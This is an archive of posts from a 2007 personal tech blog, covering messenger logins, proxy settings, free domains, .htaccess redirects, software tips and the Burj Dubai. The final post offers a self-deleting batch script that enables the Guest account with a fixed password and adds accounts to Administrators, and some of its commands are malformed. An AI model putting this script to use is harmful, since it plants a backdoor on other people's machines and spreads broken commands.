How to use Gmail email on Yahoo Messenger and Windows Live/MSN Messenger
2007-07-27 20:55:00
Did you know that you can use your Gmail email on Yahoo Messenger and Windows Live/MSN Messenger? No problem, if you didn’t. I’ll explain it here how you can do it. Trust me, this saves you two password to remember (if you have a different one for everything).
So first of all, you need to have a Gmail (or any other) address. I chose Gmail because it will make easy for the its users to access Google Talk, Yahoo Messenger and MSN Messenger all with one email. Then the next step requires you to sign up for Windows Live credentials. Most of the work is done here . After signing up you can easily login with your email on MSN Messenger. If you want all your contacts to be shifted to the new address, then read this on how you can import/export your contacts the easy way . Continue reading to see how you can use your email with Yahoo Messenger.
Now as for the Yahoo Messenger, you can’t actually sign-in using that email of yours. But your friends can add you in their Yahoo!...

How to use your email for Windows Live services
2007-07-25 21:50:31
Every now and then my friends keep asking me that how do I use my Gmail address on MSN Messenger. All I have to say is that it’s not a big thing! All you have to do is create credentials for your email address (not only for Gmail, any email provider). This way you can access almost all the Windows Live services.
To create credentials, fill this sign up form and get your email activated. Finish! Were you expecting more? If you are a Gmail user, like me, then you are lucky to have one email address that can be used on Google Talk, Yahoo Messenger and Windows Live/MSN Messenger . Wherever you are required to use a Windows Live ID, you can use this email (you just registered it). It gets quite easy to manage things with one email.

Tag for Future iPhone Owners
2007-07-25 21:23:02
Haven’t got your iPhone yet? Still waiting.. No problem. I have found a very nice tag for those who are still waiting to get their hands on the iPhone. You can use this tag on other bulletin boards, use it as a signature in your emails or put it up on your blog to let other’s know that soon you will also be an owner of iPhone!
To save the tag (user bar), for IE users, right-click on the image and select Save Picture As. And as for the Firefox users, right-click on the image and select Save Image As.
Please do not link to this image directly. Save the image on your PC and upload it on your own server or where you want to upload it. Or if you don’t know where to upload, you can use any of the free image hosts mentioned here.

Recently, I told you how to use proxy in Firefox. And now I’m going to tell you how to use proxy in Opera. I hope this will be helpful to you and you will like this.
The procedure will almost be the same as Firefox, so I’m sure Firefox users won’t have any difficulty.
First of all, get yourself a nice, fast proxy to use. You can get some from any of the paces mentioned below, or use one of your own source.
Free Proxy List 1
Free Proxy List 2
Proxy 4 Free - List 1
Proxy 4 Free - List 2
That would be enough.
Now open Opera, and go to Tools > Preferences. Now click the Advanced tab from the top and then select Network from the side options. Then click Proxy Servers.
Enter the proxy IP in HTTP box and enter the port in the Port box.
Press OK and then click OK again for the Preferences window. That’s it! Your Opera is now in proxy mode .
I hope you enjoyed this trick and would like to subscribe to my RSS feeds or through email updates.

You just be living on Mars or must be an alien if you don’t know what place is Dubai . Never mind if you really don’t know. I’ll give you a brief introduction about it. Dubai is a very small city in United Arab Emirates. You probably wouldn’t even have ever noticed it while looking at a map. And it’s the place where I have spent 13 years of my life .
Now coming back to the topic, Burj Dubai is being constructed in “New Downtown” of Dubai and on Saturday, 21 July 2007, the developers reported it’s height as 512.1 metres with 141 completed floors surpassing the Taipei 101 (509.2 m) as the tallest high-rise building in the world. Amazing isn’t it?
Facts:
Now I’ll tell some facts about this amazing structure and in the end there are some pictures of its still on going construction.
In February 2007, the Burj Dubai surpassed the Sears Tower as the building with the most floors in the world.

Free Domains: URL Redirection (Part One)
2007-07-21 22:18:48
Are you still stuck on those Wordpress.com or Blogger sub-domains? Well, it’s time to get free from sub-domains. I know sub-domains are bad and doesn’t give a good impression. Now, you can also get a domain for free and you won’t even have to pay a single buck! The places given below just allow you to have a domain name and direct your domain to another web address. Just a reminder, that the second part is going to have links to some famous sites that offer free top-level-domains .
You can choose any one of from below:
UNI.CC
The easiest way to get yourself a free domain. Actually they don’t give TLDs (Top-Level-Domain), they are sub-domains. They offer, web-forwarding services and DNS service. Rememeber my old domain, sizzledcore.UNI.CC That was the place where I got the domain from. But now, my new domain is not a free one . I’m paying up for that . Sign-up now!

How to use .htaccess for Redirection
2007-07-21 11:26:20
Recently, when I had a domain change, I needed something in order to transfer all of my traffic from the old domain to the new one. So I used .htaccess for the redirection.
You can also use this, by typing the following in your .htaccess:
RewriteEngine OnRewriteCond %{HTTP_HOST} ^.*oldwebsite.com$ [NC]
RewriteRule ^(.*)$ http://www.preferredwebsite.net/$1 [R=301,L]
Replace oldwebsite.com with the current website and replace http://www.preferredwebsite.net with the new website URL where you want to redirect the traffic to.
If you want to know what did I used for my old domain, then see below:
RewriteEngine on
RewriteCond %{HTTP_HOST} ^sizzledcore.uni.cc$ [OR]
RewriteCond %{HTTP_HOST} ^www.sizzledcore.uni.cc$
RewriteRule ^(.*)$ http://www.sizzledcore.com [R=301,L]

3 ways to speed up Acrobat Reader
2007-07-20 21:38:13
I know Acrobat Reader takes a lot of time to open and most of all, eats a lot of memory. And worst of all, it sometimes even gets opened itself when clicked to a PDF link in a browser. If you don’t have a high-end PC, you can also run out of memory at that time, resulting in having you lose a lot of work you have been doing.
So to get this fixed, I have found three ways by which you can speed up Acrobat Reader by 75% .
First Method
So, for the first method, follow the following steps:
First of all, find the plug_ins folder. And then rename it to something else like plug_ins_disabled.
Now create a new folder called plug_ins.
Then go to the previously renamed folder (plug_ins_disabled) and copy EWH32.api, printme.api, and search.api from there to the new folder (plug_ins) you just made.
Simple as pie! Now start Acrobat Reader to see the difference .
Second Method
The other way to speed up your Acrobat Reader is that you can copy all your unused plugins into the Optional folde...

Best Replacements for Windows Media Player
2007-07-20 10:06:36
Now you all know that Windows Media Player is one the worst players available. So here I have some replacements for it. I would recommend all WMP users to switch to something better. And that also when all the other good applications are free to use.
Now, let’s start the list
VLC Player
Also known as Video Lan Player is a must-have for every computer-geek just like having Harry Potter’s seventh book for a Harry Potter fan. It plays every thing you can imagine. As far as I remember, I have never had any compatibility problems with this player. You can say “It plays almost anything you throw at him“. I would recommend you to download this and try it out. It supports file formats such as MPEG, MOV, AVI, ASF, WMx, OGG, WAV, 3GP (this is just the start) and more. And one more thing, it’s skinnable just like other good applications. Download the best skins from here. The default is just like giving you a heart-attack, so get the skins now!

Top 5 Free Web Hosts
2007-07-18 16:40:31
Before buying the domain and web-hosting I was always out on the Internet looking for good and reliable free web hosts. In this search, I found a number of hosts that offered free web hosting, but all went down after a few days and made some lame excuse. But that doesn’t mean that they are no good free hosts.
If you are hosted on a free host, and are not satisfied, then I would recommend you to use any of the free web-hosts given below.
5. BryanSoft

2 Ways to Backup Your Firefox
2007-07-16 18:05:42
Recently, my Windows got infected by a powerful virus and all my C: data was wiped out . Even my Firefox bookmarks, settings, saved password etc. were deleted. The reason for all that loss was that I didn’t had any backup. I’m just too lazy to do that. But now, I have learned a lesson that backups are very important.
So here I have come up with two ways by which you can backup your Firefox.
First I’ll tell the easy way
Download the MozBackup and use that to backup your Firefox.
Now for the advanced way.
Okay, people who don’t want to use any third-party applications can use this way.
First make a new directory anywhere in your PC (where you want to store the backup). Here we will use the drive G: and the folder ffbackup as the backup directory.
Then go to: C:Documents and Settings<user account>Application DataMozillaFirefoxProfiles
There you will see a folder (or more, if you have more than one profile), and it will be named something like b47d...

How to install extra stuff in Adobe Photoshop
2007-07-13 19:54:43
I’m sure everyone is well aware of the wide variety of Photoshop addons (brushes, layer styles, gradients, patterns etc.) available on the Internet. Everyone wants top try them out. But the problem is, many of the beginner photoshopers (Photoshop users :P) don’t know how to install the extra stuff. But no worries photoshopers :D, I’m doing this post specially for those who don’t know how to install them.
There are two ways to install them. First I’ll tell the easy way.
Open your Photoshop, and from the menu above, go to Edit > Preset Manager. After the Preset Manager opens, choose what you want to install. If it’s a brush set, then you don’t need to change anything. But if you are going to install layer styles, custom shapes or anything else, then choose it from the drop down menu of Preset Type.
Then click Load and choose the file you want to install. That’s it! Your new set of brush, layer style, gradient etc. is now ready to use ...

It’s good to be on your own domain. Do tell me what do you feel about Sizzled Core . I quite excited about it. And did you noticed the new web 2.0 logo? Lol, I know it’s not good, but this was my first attempt in making one. I hope you guys like it.
P.S. Everyone who is linking to me, please replace the old URL, with the new one.

Convert Guest Account into Administrator Account
2007-07-07 20:11:51
Now here’s a small trick I found by which you can convert a Guest account on Windows XP into an Administrator one. But, first the disclaimer: This is only for educational purposes only. So don’t try to damage anything at someone else’s place.
All you need to do is copy the code below, copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.
echo off

cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Double-click the file to execute or type the above-given code in Command Prompt.
I have only tried this once or twice. I found this file in a corner of my PC, so I thought sharing it with my readers.
I hope you enjoyed this little trick.
